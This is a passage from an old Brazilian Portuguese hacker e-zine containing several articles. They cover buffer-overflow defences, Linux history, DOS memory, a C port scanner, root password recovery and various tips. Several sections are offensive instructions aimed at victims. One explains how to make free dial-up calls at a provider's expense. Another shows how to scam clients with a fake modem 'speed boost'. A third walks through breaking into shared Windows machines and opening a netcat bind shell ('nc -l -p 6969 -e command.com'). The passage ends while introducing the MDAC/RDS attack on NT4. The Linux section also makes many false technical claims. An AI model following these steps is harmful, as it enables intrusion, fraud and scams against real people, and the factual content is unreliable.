  /* execute :) */
  execl(ELMPATH, "elm","-f", buff, NULL);
}

---[ CONTORNANDO O PROBLEMA ]-------------------------------------------------

      Sabemos entao que ataques do tipo Buffer Overflow explora a ausencia de
"bound checkings" no tamanho do input a ser estocado no buffer, sendo assim
parte do problema encontra-se na escrita do codigo pelo programador, ja que na
linguagem C, funcoes tais como gets e strcpy nao fazem os "bounds checkings",
sendo esse o padrao definido no ANSI C.
      A funcao strcpy nao verifica o tamanho dos dados enviados p/ ela por 	
meio de quaisquer argumentos, por isso existe a possibilidade de se sobrescrevera o endereco de 
retorno e execucao de codigo arbitrario.


 [ Tools ]
    
[~]   StackGuard: Tornando o STACK seguro.
   StackGuard e' uma extensao de compilador que otimiza o codigo executavel, 
sendo capaz de detectar ataques contra a area de stack	 	   
  StackGuard previne mudancas no endereco de retorno e' ate' mesmo a sobrescritano endereco de 
retorno, atraves da implementacao de patch no gcc.

[~]   O Solar Designer, autor do famoso John The Ripper, libera patches para o
kernel, que tambem atuam de forma a previnir ataques de buffer_overflows na areade stack. 
[www.openwall.com.br]
   
[~]   Uma outra ferramenta que age de forma diferente, eh que deve ser apontada como uma 
alternativa eh o Virtual eXecuting Environment (VXE).
Sabemos que quando um programa roda com suid, ele pode acessar todas as fontesso sistema, o 
vXe cria ambientes virtuais para cada programa e seus subprocessosrestringindo o uso de certas 
syscalls do kernel que venham a compr0ometer a seguranca, sendo possivel manipular o nivel de 
restricoes desejadas pelo admnistra dor do sistema.
  Maiores informacoes: http://www.intes.odessa.ua/vxe
 

/*-----------------------------------------------*/

[Conclusao]:
    Bem pessoal, espero ter passado o assunto de uma forma que
todos aqueles que "respiram" c pudessem entender numa boa, porem a reflexao  
sobre o que foi comentado acima se faz necessario para se absorver o conteudo.
  Aqueles que quiserem se aprofundar mais nao deixem de ler o txt do Aleph1, e'
realmente um excelente trabalho. Esse pequeno txt, apenas aborda de modo geral 
a questao, voce deve se aprofundar para realmente "pegar o jeito da coisa".

					    
Esse texto foi feito por CYNC !!
Home Page: http://www.mbc-corp.com.br


						    				    Cync
					                                  fsaraiva@mbc-corp.com.br
.:x| ------------------------------------------------------------------------------------ |x:.









SETOR [05]
==[ Linux             ]==
==[ Por Stealth       ]==

        
Linux

O Linux  um sistem operacional desenvolvido por Linus Torvalds, um estudante da faculdade 
de cincias da conputao no incio dos anos 90. Sua idia era a de se criar um sistema que 
fosse baseado no UNIX, que fosse ainda mais eficiente e que tivesse mais e mais recursos. 
Para tal, Torvalds recorreu  Internet, onde, com a ajuda de outros programadores e de 
alguns hackers, foi encontrando os pontos vitais, que so necessrios nos sistemas do 
futuro. Um deles,  a plena integrao com a Internet. O Linux, ao contrrio do Windows 
da Microsoft e o OS2 da Apple, possui o kernel do sistema primeiramente direcionado para o 
controle total do hardware da mquina, e depois, o controle total da rede onde ele est 
ligado. Uma rede de Linux  bem mais eficiente que uma rede MS-NT ou Novell porque ele pode 
gerenciar os protocolos de rede, entre eles o TCP-IP da Internet de uma maneira que reduz as 
perdas e mal interpretaes dos pacotes enviados e recebidos significantemente, alm de poder 
gerar a conexao  Internet direta com um backbone, sem a necessidade de se ter um provedor de 
Internet configurado. Isso por causa da arquitetura da Internet. Essa arquitetura  composta 
da seguinte forma:

-Servidores: so os backbones. COmputadores do tamanho de salas com terabytes de capacidade de 
armazenamento de informaes. Sua funo  bem semelhante aos servidores das LANS ou redes 
locais, onde sua funo  a de armazenar os dados compartoilhados comumente por todos os 
usurios, alm de poder iniciar ou interromper um acesso ao sistema.

-Provedores: So os intermedirios entre a maioria dos usurios e os backbones. Podem ser 
considerados como sendo sub-servidores, pois possuem o mesmo poder dos servidores sobre os 
usurios, mas no sobre os servidores. Eles trabalham com os sistemas operacionais Linux ou 
UNIX, assim como os backbones, e por isso, so considerados intermedrios.

-Usurios: so todos os computadores que se conectam  Internet com a funo de enviar ou 
conseguir informaes. Como 80% aproximadamente, usa o sistema Windows, e como h uma grande 
incompatibilidade em se realizar redes com sistemas operacionais diferentes, h a necessidade 
de um sistema que atue como intrprete entre os sistemas de plataforma Microsoft/Apple e 
UNIX/Linux.

Explicado o porque do Linux ser usado para as redes, vamos voltar  sua histria.
Quando a primeira verso do kernel do Linux foi lanada na Internet com a verso 0.09, o 
sistema teve seu kernel registrado no GNU e foi liberado como software livre para quem 
quisesse baix-lo para o computador e instal-lo.
Mas o sistema ainda continha muitas falhas e era sujeito a muitos bugs. S que, por se tratar 
de um software livre, ou seja, com Open Source, ou cdigo fonte exposto, os prprios usurios 
do sistema puderam ir, aos poucos, consertando os erros e modificando o sistema para ficar cada 
vez mais hospitaleiro. Toda alterao no kernel era enviuada de volta para Torvads, que juntava 
as melhorias em um kernel novo e o disponibilizava novamente para os prximos downloads.
Assim, o Linux chegou ao que  hoje, e que atende s necessidades de quase todos os usurios. 
Para se ter uma idia, voc que  usurio de um outro sistema operacional como o Windows j 
deve ter tentado fazer alguma operao no sistema e que percebeu que no era possvel, ou que 
por alguma falha no sistema no poderia mais ser realizada. No Linux no h esse tipo de coisa.
Voc, quando logado como Root#(Root  o superusurio da mquina.  ele que faz a configurao 
do sistema, a manuteno e gerencia os acessos para outros usurios. O Root no Linux  definido 
com o caracter # no prompt. Os demais usurios possuem o smbolo $) pode realizar todas as 
operaes namquina, e, se por alguma eventualidade, essa operao no existir, voc pode 
adicion-la apenas recompilando arquivos de sistema ou o prprio kernel do sistema.
Espere a! Eu vi acima voc falar em prompt! Mas o Linux que eu tenho visto em Home Pages  
igual ao Windows. Que histria  essa???
Isso mesmo, o Linux foi originalmente concebido como um sistema com interface escrita, assim 
como o UNIX ou o DOS, mas sem que isso retirasse qualquer qualidade do sistema. Algumas pessoas 
preferem o Linux com sua interface original pois se sentem mais a vontade com o sistema.
S que a maioria das pessoas acha maior facilidade em aprender ou visualizar o contedo de um 
cpomputador com imagens e sistemas grficos. Assim, foram surgindo alguns emuladores de 
ambiente grfico para o Linux. Hoje, a maioria dos sistemas opera em interface grfica, que 
vem acompanhada nas distribuies do Linux ao pela Internet. Assim que o Linux, com seus 
diversos ambientes grficos comeou a atrair mais e mais usurios acabou tambm por atrair a 
ateno de diversas softhouses como a Sun Microsystems, a Netscape e a Corel.
Assim, um distribuio do Linux , nada menos do que um pacote contendo o Linux, o seu ambinete 
grfico e uma srie de programas pre-empacotados juntamente no setup, e que so descompactados 
para os devidos diretrios no momento em que o sistema  instalado em um disco rgido.
O Linux necessita de um espao em disco mnimo de 10mb, para rodar o sistema em modo escrito , 
como o DOS. 90mb  necessrio para a mnima instalao com recusos como suporte TCP-Ip e 
ambiente grfico. Uma distribuio necessita em mdia de 500mb de espaco para rodar, embora 
quase sempre acabe utilizando por cerca de 1gb, contando o espao para arquivos do usurio ou e 
de spool, ou seja, arquivos temporrios.
Outra coisa muito importante a saber antes de realizar qualquer instalao  justamente quais 
os componentes exatos do seu hardware, assim como suas configuraes, uma vez que, para que o 
sistema rode eficientemente, seja necessrio dados precisos sobre o que ele est controlando.
As distribuies Linux atuais necessitam de um computador com os seguintes requsitos mnimos:
-processador 386 com chip de calculos embutido ou emulador do mesmo.
-8mb de memria RAM
-Monitor VGA color
-Teclado padro 101 102 teclas
-mouse
-90mb de espao em disco disponvel
Lembrando que a memria RAM, mesmo em quantidades pequenas, d ao Linux um maior rendimento se 
comparado a outros sistemas. Isso porque o Linux tambm  o melhor sistema no quesito 
gerenciamento de memria, no qual os sistemas Microsoft costumam falhar. Mas no quesito memria 
de vdeo, ningum superou a Apple, com comptadores com um sistema de vdeo onde animaes 
ocorrem em tempo real, por mais pesadas que sejam.
Agora voc j possui uma boa base para adquirir um sistema Linux. Para maiores informaes, 
visite os endereos abaixo:
http://www.conectiva.com.br
>>>Site oficial do Linux Conectiva, o Linux totalmente em porqugus brasileiro.

http://www.redhat.com
>>>Site oficial do Linux RedHat, que pode ser cnsiderado um dos mais utilizados em todo o mundo.

ftp://sunsite.unc.edu
>>>ftp com quase todas as distribuies do Linux disponibilizadas para download, alm de ser o 
stio mais completo do LDP (Linux Documentation Project) que  um projeto organizado por 
estudantes de todo o mundo a fim de registrar todas as operaes de instalao e configurao 
possveis. Esses documentos incluem HowTo's e livros em diversos formatos e linguagens, prontos 
para download. H tambm um HowTo nominado HowTo-HowTo que indica como voc pode escrever um 
desses documentos e public-lo nos stios de FTP oficiais e espelhos confiveis.

ftp://linux.tucows.com.br
>>>Stio de FTP da tucows onde h alguma documentao (bem pequena) sobre o Linux, e uma srie 
de distribuies.

											 Bruno Lucatteli
					                                     the.stealth@bol.com.br
.:x| ------------------------------------------------------------------------------------ |x:.



                                    








SETOR [06]
==[ Conectando a cobrar ]==
==[ Por 0_of_Coll       ]==

        Opa, e ae! Esta eh a primeira vez q estou escrevendo neste zine. Claro neh, este  o 
primeiro! Espero estar escrevendo mais vezes nele... putz, chega de bla bla bla..
 
Bom, vamos l.. Vou disponibilisar alguns n's de telefones para que vcs possam ficar o dia 
inteiro sem se procupar com a conta telefonica, a vitima sera a IG :

Voce tem que configurar o n que  [9021] ou [9023] a cobrar. 

Um Simples exemplo:

[11]  o ddd de So Paulo.
[7266000] telefone da ig de So Paulo. 

Entao, o n ficaria assim: 90211172660000. 
Tem outro que : 9021117373980000

Voce pode usar o 9021 ou 9023. Para vc descobrir mais n vc tem que pegar o discador da IG e 
no lugar onde esta 'Discar', primeiro vc coloca, 9021 ou 9023 e em operadora ddd vc deve colocar
a operadora do local para onde vc esta discando. 


Obs.: Em alguns tipos de provedores soh funcionar se for 9021... caso alguem queira se dedicar 
em ligaoes a cobrar e achar outras falhas.

Bom, chegamos ao final...
vlz Gotoxy...

					    						  0_of_Coll
					                                      bsemenow@terra.com.br
.:x| ------------------------------------------------------------------------------------ |x:.









SETOR [07]
==[ Aumentando os bps   ]==
==[ Por GoToxY          ]==
        
        .. isso mesmo, aumentando os bps. Mas,  pura mentira.  um jeito novo de ganhar 
dinheiro! Voce diz para o seu "cliente": "Eu posso aumentar a velocidade da sua conexao por 
apenas 15 reais". Claro que ele nao vai negar neh, soh se ele tiver bem duro na grana. Nao 
precisa ser 15 reais, pode ser um preo maior ou menor. Voce que sabe.. Convea-o, dizendo que 
fica 10x mais rpido, q fica como dvi ou isdn, etc,etc...

        Tipo, quando o cara posicionar o icone do mouse em cima daquele icone da barra de
tarefas q indica que o user esta na net, vai aparecer 115bps. Normalz, q ele conecte menos
de 56bps.. ai, o pangu vai querer conectar a 115bps e vai aceitar o contrato. 

        Let's go.. Entre no Painel de Controle e depois d um duplo clique no Modem. Depois,
selecione o modem do kra e clique em 'Propriedades'. Em seguida, clique em 'Conexo'. Logo,
clique em 'Avanadas...'. Por fim, em "Configuraes Adicionais...", digite o seguinte cdigo:
at&fx3f10=50&w
         
         Pronto. Conecte para testar... Conectou?? Deu certo? hum... entao tah bom...
Agora, meu caro leitor, desaparea do mapa, pois o "cliente" esta em sua caa! Putz,
ele vai ver que a conexao continua a mesma bosta e ir atrs de voce para tirar 
satisfaes.. huahauhauahua .. q dani-se ele!

	DICA: nao faca isso na frente dele. Leve o pc para a sua casa (soh a torre, eh claro).  
Porque, se voce digitar somente este simples codigo (at&fx3f10=50&w),  ele  vai  desconfiar.

H outros cdigos para aumentar os bps.. mas, por enquanto eu soh sei esse mesmo. Se quiserem 
me mandar algum codigo, eh soh enviar para o nosso mail. Divirta-se com a grana!!!

                                     
						     					    Gotoxy
					                                        gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------------ |x:.









SETOR [08]
==[ Links               ]==
==[ Por Kbytes          ]==
        
        Opa.. tipo, vou falar de alguns links sobre variados tipo de assunto... que talvez seja 
util para voce.. bom, olhe ai abaixo se algum interessa voc: 


LINK:                      DESCRICAO:


-[Links de Exploits]-

www.rootshell.com:         um otimo local para a busca de exploits
www.hack.co.za		   otimo site tb.


-[Links de Programacao]-

www.vbbrasil.com:          site com sources, dicas, forum de vb.
www.vbonline.com.br:       outro site de vb, nao gostei muito nao.
www.programadores.com.br:  um bom site, eu recomendo a voces.



-[Links de Donwloads]-

www.superdownloads.com.br: otimo site para se achar programas, jogos, entre outros.
www.warez.com:             um outro site para se achar softwares.
www.tucows.com:            um centro de distribuio de programas, shareware e freeware



-[Links de seguranca, ataques, exploits, etc]-

www.hacker.com.br:          otimo site, com news e informacoes do mundo undergound
www.hackernews.com.br:      um bom site tb, com varias informacoes e talz
www.securenet.com.br:       um otimo site tb, com exploits, vulnerabilidades, etc..
www.root-br.com:		    otimo site, publicado a pouco tempo e ja vem fazendo sucesso.


-[Links "HackersGirl"]-

www.antichildporn.org:      site hacker de mulheres. 
www.condemed.org		    site hacker de mulheres.
www.geekgirl.com.au         site hacker de mulheres.


-[Links "Anti-Hackers"]-

www.hackers.com.br:         site para leigos, cujo objetivo eh manter o usuario protegido.
www.antionline.com:         um otimo site anti-hacker tb.
   


-[Links de Hardware]-

www.clubedohardware.com.br: varias informacoes, incluindo testes comparativos e explicacoes
				    muito bom mesmo. vale a pena entrar. Prof Gabriel Torres
www.laercio.com.br          um outro site bom, mas eu prefiro o site do clube do hardware.
                                          
											     
											    Kbytes
					                                        kbytes@zines-br.com
.:x| ------------------------------------------------------------------------------------ |x:.









SETOR [09]
==[ Scaneadores ]==
==[ Por Gotoxy  ]==

	Opa! Vou falar de alguns scaneadores. Existem varios scaneadores, quanto para Windows 
quanto para Linux. Vou falar somente  dos scaneadores desses  dois sistemas  operacionais,  
pois sao os mais  utilizados  ultimamente por usuarios 


-[ SCANEADORES DE WINDOWS ]-

-Scaneador de portas-
No windows, h varios scaneadores de portas mas um dos melhores, um que usei la na idade da 
pedra, foi o PortScan. Achava ele muito massa, sempre usava ele. Voce pode encontrar ele em 
varios site ai da internet, procure ele no Cade? (www.cade.com.br). 

-Scaneador de cgi-
O melhor,na minha opiniao,eh o Twwwscan. Por ser rapido e de scanear varis cgi's encontrados
no server.A ultima versao dele eh o 0.5 e encontra-se no site http://packetstorm.securify.com. 
Tem um outro cujo nome eh scs. Ele eh muito bom mesmo, talvez ate melhor que o Twwwscam. Nao
sei onde tem ele, mas pode ser encontrado no site do Cade? tambem.


-[ SCANEADORES DE LINUX ]-

-Scaneador de vulnerabilidades/portas/cgi-
No linux tem varios scaneadores otimos. Um deles eh o sscan, muito bom. Um outro que tem eh o
nmap, ele eh otimo.  O Vetescan tambem eh muito bom. Voce pode encontra-los no seguinte site: 
http://packetstorm.securify.com. Voces devem encontra-los l, mas nao tenho certeza pois
nao me lembro onde peguei os q estao aqui na minha makina. Caso nao encontre, procure no site
do Cade?

Abaixo segue um codigo de scaneador de portas. Seu codigo eh simples mas ele eh eficaz. Ele 
escaneia as portas desde 1 ate 9999. Se voce nao achar o scans citados acima, compile esse 
mesmo. ;) 

Salve ele em um arquivo .c e depois compile: cc nome.c -o nome e execute: ./nome
Funfou neh? blz...


<<<<<<<<<<<<<<<<<<<<<<<<<<<<cut here>>>>>>>>>>>>>>>>>>>>>>>>>>>>

<++> progs/xscan.c
#include <string.h>
#include <stdio.h>

main(){
        int a;
        char ip[255],str2[255];
        
        printf("Scaneador de Portas");
        printf("\nColoque o host a ser scaneado: ");
        gets(ip);
        for (a=1;a<9999;a++)
{       sprintf(str2,"telnet %s %d",ip,a);
        system(str2);
} }
<-->				
					          
<<<<<<<<<<<<<<<<<<<<<<<<<<<<cut here>>>>>>>>>>>>>>>>>>>>>>>>>>>>


						     					    Gotoxy
					                                        gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------------ |x:.









SETOR [10]
==[ Memoria    ]==
==[ Por Gotoxy ]==

E ae.. bom.. nao sei se isso jah aconteceu com voce, meu caro windows user,
mas, as vezes, quando tentamos executar um aplicativo Ms-Dos, aparece  uma  
mensagem: "No enogh memory", indicando memria insuficiente para  executar 
tal aplicativo. Isso ocorre porque o Ms-Dos soh "enxerga" 1MB de  memria, 
dividido segundo o esquema abaixo:

# Mapa de Memria   
			   0  ________________________
                       |                        |
                       |                        | -> memoria convecional
                       |                        |          |-> programas
                 640 KB|_______dividido_________|
                       |                        |
                       |                        |
                       |                        | -> memoria alta
			1 MB |________________________|         |-> reservada


Essa indicacao de falta de memoria, significa na verdade, falta de memoria convecional. 
Eh necessario entao liberar memoria convecional. Isso sera feito atraves do arquivos: 
autoexec.bat e config.sys. Ambos localizados na raiz C:\.

No autoexec.bat, temos varios comandos que podem ser adicionados ao sistema para 
facilitar o trabalho do usuario. Contudo, tais programas ocupam memria convecional. 
A ideia entao eh carregar tais programas na memoria Alta.


# O Procedimento

Para os comandos do autoexec.bat que ocupam memoria convecional serem carregados na 
memra alta, devemos precede-los por um LH.

Exemplo: LH Doskey

Coloque LH, em todas as linhas do autoexec.bat.
Com isso, os programas serao carregados na memria alta. Mas, ainda falta um pequeno 
detalhe. Agora, nos vamos modificar o config.sys. Ambos com o autoexec.bat e o config.sys, 
use o Edit do dos, pois eh melhor. 

Entre no prompt do Ms-Dos e digite o seguinte:

C:\WINDOWS> cd..
C:\> edit config.sys

Pronto, agora, coloque as tres seguintes linhas, no comeco do config.sys:

Device=C:\Windows\Himem.sys
Device=C:\Windows\Emm386.exe RAM Highscan
Dos=High, UMB

Substitua todos os comandos "Device" para "Devicehigh". Menos as linhas que carregam
o Himem.sys e o Emm386.

Pronto. Reinicie a makina..
Agora voce pode executar o programa que voce estava querendo executar!


										          Gotoxy
					                                        gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------------ |x:.










SETOR [11]
==[ Ro0t       ]==
==[ Por Gotoxy ]==

-[ Introducao ]-

	Muitos ignorantes, acabam esquecendo a propria senha root do seu sistema e  depois nao
sabem o que fazer. Entao, caros imbecis, vou ajuda-los a recuperar sua senha. Pois eh, se vc
perdeu sua senha, talvez nem possa ler isso. Entao,isso aqui vai para os ignorantes  que tem  
um SO windows no hd ou outro sistema instalado no mesmo, alem do linux e que tenha esquecido 
a senha root. Para os que soh tem o Linux e tenha esquecido a senha,entre na net no pc de um 
amigo e faca o download da edicao 00 do zinesbr. Mas, nem adianta falar.Muitos que esqueceram 
sua bela senha e que nao conhece a edicao 00 do zinesbr e que tb nao tenha nenhum  amigo  que 
conheca o mesmo nao vai saber o que fazer. Mas, caso  voce esqueca sua senha futuramente, jah 
ensino de uma vez.

-[ Perdi a senha r0ot, o que fazer? ]-

	Caso voce utilize o LILO como gerenciador de boot, o processo eh simples.Quando aparecer
o prompt do LILO, acrescente o parametro single. Segue o exemplo:

LILO: linux single

	O sistema carregara e ira direto para o prompt, nao passando pela tela de login. Logo,
basta digitar no prompt o comando:

passwd

	O sistema solicitara uma nova senha para o root. Agora eh soh digitar a nova senha,
confirmar e em seguida reiniciar a makina.


-[ Posso tirar proveito disso? ]-

	Claro que sim. Porem, voce soh pode tirar proveito disso localmente. Portanto, eh soh
seguir o mesmo passo citado acima. 

-[ Como me proteger? ]-

	Tem jeito de se proteger disso. O melhor jeito eh alterar um arquivo no Linux para q
seja pedida uma senha toda vez que o usuario digitar "Linux single".
	Para realizar essa alteracao, abra o arkivo lilo.conf, localizado na pasta /etc e 
acrescente dois comandos: password e restricted. Confira neste arkivo de exemplo de como
que ficara o arkivo lilo.conf apos as modificacoes:

#--lilo.conf--#
	
	boot = /dev/hda
	timeout = 50
	prompt
	  default = dos
	  vga = normal
	  password = zinesbr
	  restricted
	  read-only
	map=/boot/map
	install=/boot/boot.b
	image = /boot/vmlinuz-2.2.13-9cl
	  label = linux
	  root = /dev/hdb1
	other = /dev/hda1
	  label = dos
	table=/dev/hda

#--fim do lilo.conf--#

	Entendeu? Se sim, tudo bem... caso contrario, vou explicar: se voce perder a senha de
root e se o lilo.conf estiver configurado com aqueles dois comandos (password e restricted)
e se voce digitar "linux single" no LILO, sera pedido uma senha. No caso acima a senha  eh 
"zinesbr". Logo,voce entrara no prompt e ai vc digita passwd e coloca a nova senha de root.

						
											    Gotoxy
					                                        gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------------ |x:.









SETOR [12]
==[ Curiosidade ]==
==[ Por Gotoxy  ]==

	Opa! Tipo, nao tinha um titulo melhor para colocar e coloquei esse mesmo (duh).
Vou falar dos perigosos ingredientes quimicos mais usados para a contrucao de chips, 
monitores e placas de circuitos e seus efeitos em nois, ou melhor, em todos os seres
humanos. 

	
	=> Acido nitrico e compostos de nitratos
O acido nitrico eh letal. Destroi a carne instantaneamente. Cheirar um pouco eh mortal. 
Agencias de protecao para operarios sugerem que trabalhadores que tem  contato  com  o 
acido nitrico facam testes anuais para detectar envenenamento dos pulmoes e corrosao dos
dos dentes.

	=> ter Gliclico
Diversos estudos indicam relacao com interrupcao de gravidez. Exposicao prolongada compromete
o sistema nervoso, o figado e rins. A industria garante estar diminuindo o uso dessa substancia.

	=> Cobre e compostos de cobre
Nao eh particulamente venenoso quando puro, mas reage quando misturado. Por exemplo: sulfato de
cobre eh um acido explosivo que eh geralmente misturado com chumbo e niquel.

	 => Xylnio
Pode causar defeitos em fetos, incluindo hidroencefalia em bebes gerados por maes expostas  
substancia. Tb esta ligado a deformacoes da medula, do estomago e pernas, alem de induzir 
abortos e hemorragias.

	=> Acido hidrocloridrico
Contato direto com a pele provoca seu imediato derretimento. O corpo pode entrar em choque. Se
for ingerido, os tubos do sistema digestivo rompe-se.

	=> Compostos de chumbo
Provavel concergeno e notorio detonador de tecido cerebral. Exposicao prolongada causa danos
ao sangue, rins e sistema nervoso.


	Perigoso nao?! Portanto, se voce pretende trabalhar em construcao de chips, placas de 
circuitos e monitores, pense duas vezes, ou melhor, pense varias vezes. Isso aqui eh soh para
alertar voce dos grandes perigos q esses componentes quimicos podem causar em voce.Puts, nunca
quero trabalhar nuns trampos desses... muito perigoso mesmo. 


											    Gotoxy
					                                        gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------------ |x:.









SETOR [13]
==[ Compartilhamento ]==
==[ Por Gotoxy       ]==

	Bom, nao ia colocar isso nao, mas como o cara implorou para eu colocar, resolvi colocar.  
Ele enviou para mim uma msg por email pedindo para mim ensinar como acessar  computadores  que 
estejam compartilhando seus arquivos, pois ele lia na net varios  textos sobre  isso  mas  nao 
conseguia executar  o ataque com sucesso. Nao vou mandar um email para ele respondendo sobre o 
mesmo porque outras pessoas podem ter a mesma duvida. E para me poupar trabalho, coloco aqui de 
uma vez como acessar por compartilhamento.
	Tipo, tem um programa chamado Essential Net Tools.Ele foi programado para acessar makinas 
remotas atraves de compartilhamento... mas nao foi feito com intuito de invadir, o objetivo era 
ter um programa para acessar computadores compartilhados de uma rede com mais facilidade. Porem, 
quem disse que ele nao pode ser usado como um ataque?! ;)
	Voce encontra ele no site http://www.tamos.com. Usar ele nao tem misterio. Ele tem algumas 
outras funcoes alem de acessar por compartilhamento. Duvidas em usa-lo? Consulte a net...

						   _______
						:x[ Bonus ]x:
						  ''''''''' 
	Okay, um bonus saindo quentinho!!
Eh o seguinte, vamos acessar o host invadido por compartilhamento via telnet! como? simples...

Do que preciso?
.x. Voce precisa do nc (netcat). Pode encontra-lo no site www.l0pht.com/~weld/netcat
.x. Voce precisa do telnet tb 
.x. Voce precisa tb de um neuronio no cerebro :)

Blz, isso eh o suficiente...
	
	-Agora, scaneie os ip's q estao compartilhamento seus dados com o Essential Net Tools...
	-Logo apos achar um ip que esta compartilhando, abra-o...
	-Depois, voce envia o netcat para a raiz C:\ 
	-Apos voce enviar, clique duas vezes no arquivo command.com e digite:

C:\Windows\> cd..
C:\> nc -l -n -v -p 6969 -e command.com

	Agora, clique em 'Iniciar' e depois em 'Executar' e digite: telnet
	O telnet sera aberto, agora clique em 'Conectar', 'Sistema Remoto' e depois coloque o 
ip da vitima e tb coloque a porta (no caso, a porta eh 6969). O ip da makina vitima pode ser
pego atraves do ENT(Essential Net Tools).
	Parabens, voce agora eh elitao :) 
	
Mas, porque isso acontece?
	-O command.com eh uma shell, equivalente a um /bin/bash
	-O nc fica "ouvindo" na porta 6969, esperando uma conexao externa
 	-Quando alguma makina conectar no server invadido, sera executado o command.com 
	-Resultado disso: uma bela shell no rWindows 

Obs: 
Voce pode deixar "ouvindo" em qualquer outra porta; coloquei a porta 6969 soh por exemplo
	  	
Pronto sangue bom's, eh soh isso! Espero que entendeu o que foi escrito aqui! Caso 
contrario voce deve ler tudo novamente e se ainda nao entender, suicida! Para voce 
obter mais informacao  sobre o que foi  escrito aqui,  me mande um email!  7h3 3nd  

						      				    Gotoxy
					                                        gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------------ |x:.









SETOR [14]
==[ Dicas de Win\Lnx ]==
==[ Por Gotoxy       ]==

						    ___________
				[ Para Linux ]==[ Dica #1 ]==[ Para Linux ]

-> Descompactando arquivos no Linux

Bom, nao vou falar nada demais nao. Vou apenas ensinar como descompactar arquivos, 
como: .tgz, .zip, .bz2, etc. No linux existem  varios compactadores  e  extensoes 
diferentes, o  que o torna dificil  para leigos users lnx  descompactarem  files. 

Entao, user lnx, siga os modelos abaixo:

Arquivos ".tar.gz", ".tgz" e ".Z":
tar zxpvf nome.tar.gz --directory=/dir/para/onde
Ex.: tar zxpvf arquivo.tar.gz --directory=/root

Arquivos ".tar":
tar cxvf arquivo.tar --directory=/dir/para/onde
Ex: tar cxvf eu.tar --directory=/tmp

Arquivos ".zip":
unzip -d /dir/para/onde arquivo.zip
Ex: unzip -d /root/exploits xploit.zip

Arquivos ".arj":
unarj e nome.arj unarj x nome.arj

Arquivos ".bz2":
bunzip2 -d arquivo.b2

Existem outras... mas, as mais uteis, sao essas citadas acima.
Com isso voce podera descompactar os seus arquivos tranquilamente.


							___________
		 		[ Para Windows ]==[ Dica #2 ]==[ Para Windows ]
		
-> Retirando os "estragos" dos kits de acesso

Puts, muitas pessoas recebem aqueles kits de acesso de provedores e vao logo
instalando. Ai,  muitas das  configuracoes atuais do  computador dela  muda, e ela 
nao consegue restaurar as configuracoes antigas do computador e fica fera. pow, q sux 
entao resolvi  colocar  aqui como se faz  para restautar  as  configuracoes padroes  
do computador vitima dos kits de acesso. 

	Para voltar com as configuracoes, eh necessario mecher no regedit. Para acessar
o regedit, voce clica  em  'Iniciar', em seguida clica  em  'Executar'. Logo, digite 
"regedit" (sem as aspas). 


	1) Logo que entrar no regedit, localize a chave HKEY_USERS, .Default, Software, 
	Policies, Microsoft, Internet Explorer, Control Panel
	2) Localize a chave Home Page e altere o valor de 1 para 0. Desta forma voce
	restaura as propriedades da pagina inicial do Internet Explorer.

	Ainda no regedit, aproveite para desabilitar o logotipo que os provedores
	colocam no Internet Explorer. Faca o seguinte:

	1) Localize a chave HKEY_USERS, .Default, Software, Microsoft, Internet Explorer,
	Toolbar
	2) Remova os valores dos campos BrandBitmap, SmBrandBitmap, BackBitmap
	Com isso, nao tera mais o logotipo do provedor. 

	Para finalizar, remova o papel de parece que insiste em ficar na area de trabalho
	do windows. Siga o modelo:

	1) Localize a chave HKEY_USERS, .Default, Control Panel, desktop
	2) Altere o valor do campo Wallpaper para vazio

	
	Com isso voce estara livre das configuracoes que sao colocadas pelos provedores
de acesso e podera configurar seu windows da forma  que achar mais conveniente. Nao
se esqueca de NAO instalar o kit novamente.. porque senao voce tera que fazer tudo
denovo! 


				[ Para Linux ]==[ Dica #3 ]==[ Para Linux ]

-> Alterando o Crtl+Alt+Del no Linux

	Ao pressionar Ctrl+Alt+Del no modo terminal do linux, vc jah deve ter reparado que
o linux eh automaticamente reiniciado (duh). Porem, se voce que ele seja desligado e nao
reiniciado, basta editar o arquivo /etc/inittab e procurar pelas seguintes linhas:

#Trap CTRL-ALT-DELETE
ca::ctrlaltdel:/sbin/shutdown -t3 -r now

	Repare no parametro -r. Eh ele que faz a makina reiniciar no Ctrl+Alt+Del . Desta forma,
basta trocar este parametro (-r) por -h para que a makina seja desligada. Logo, ficaria desta 
forma:

#Trap CTRL-ALT-DELETE
ca::ctrlaltdel:/sbin/shutdown -t3 -h now

							

				[ Para windows ]==[ Dica #4 ]==[ Para Windows ]

-> Entrando no "Somente Prompt" toda vez que o windows for reiniciado

Existe uma forma de entrar toda vez no "Somente Prompt", sem que toda hora 
precise apertar a tefla F8 na inicializacao e selecionar no menu. Isso eh para 
users win98!

# Procedimento

Entre no prompt do Ms-Dos, e faca como o modelo abaixo:

C:\WINDOWS> cd..
C:\> edit msdos.sys

Agora, altere a linha "BootGUI=1" para "BootGUI=0". 
Antes disso voce deve digitar:

attrib c:\msdos.sys -r -a -s -h 

para mudar as propriedas do arquivo. Aps a edicao, restaure os padroes originais, 
usando o comando:

attrib c:\msdos.sys +r +a +s +h

Pronto!
Com isso voce podera entrar sempre no Prompt do Ms-Dos toda vez
que reiniciar a maquina.  


											    Gotoxy
					                                        gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------------ |x:.









SETOR [15]
==[ Hacking Winnt4.0 (RDS) ]==
==[ Por Gotoxy             ]==

							____________
 					          -[ Introducao ]-

	Ae! Essa tecnica esta meio ultrapassada, mas muitos ainda nao conhecem, e ainda  funfa 
em servidores winnt4.0. Estamos falando do pacote MDAC (Microsoft Data Access Components)  e 
da vulnerabilidade encontrada no RDS que, em conjunto com o uso  do  acesso  de  dados   via  
ODBC, possibilita o acesso nao autorizado ao servidor Windows. 
	

						  ____________________
						-[ Do que eu preciso? ]-

	Eh necessario o Perl instalado no seu sistema,  caso nao tem, entre em  www.perl.com 
e pegue a versao do seu SO. Voce precisa tb de dois arquivos: msadc.pl e sas.pl. Podem ser
encontrados no site www.hack.co.za. Chegando la, entre na parte de WindowsNT e procure por
'rds_rootkit.zip' e faca o download (duh). Se voce preferir,faca um servidor de ftp na sua
makina ( voce sabera pq mais abaixo ).  Ou  entao,  cadastre-se em algum servidor gratuito 
e envie o nc (netcat) para la. O nc pode ser encontrado no site www.l0pht.com/~weld/netcat
